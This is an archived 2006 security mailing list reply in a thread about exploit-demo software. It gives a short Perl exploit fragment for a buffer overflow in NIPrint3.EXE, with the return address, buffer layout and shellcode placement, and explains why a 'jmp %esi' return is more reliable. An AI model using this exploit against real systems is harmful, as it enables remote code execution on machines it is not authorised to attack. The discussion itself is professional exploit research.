Dailydave mailing list archives
Re: VisualSploit redux
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Tue, 23 May 2006 17:35:38 -0500
On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
Anyways, there's a movie here: http://www.immunitysec.com/documentation/vs_niprint.html
Not to nitpick, but there is a better way to exploit this bug: 'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ], my $req = Pex::Text::AlphaNumText(8192); substr($req, 0, 2, "\xeb\x33"); substr($req, 49, 4, pack('V', $target->[1])); substr($req, 53, length($shellcode), $shellcode); $s->Send($req); This will return to a "jmp %esi", where %esi points to the source string before the memory overwrite. The benefits of this vs the "jmp %esp": * Our code isn't running so close to ESP (easy to fix w/prepend) * More room for the actual payload (could even embed the ret) * The return address will work regardless of OS/SP combo Fun stuff, keep up the demos :-) -HD
Current thread:
- VisualSploit redux Dave Aitel (May 23)
- Re: VisualSploit redux Burns Bryan (May 23)
- Re: VisualSploit redux H D Moore (May 23)
- Re: VisualSploit redux Bas Alberts (May 23)
- <Possible follow-ups>
- VisualSploit redux Damian Gomez (May 23)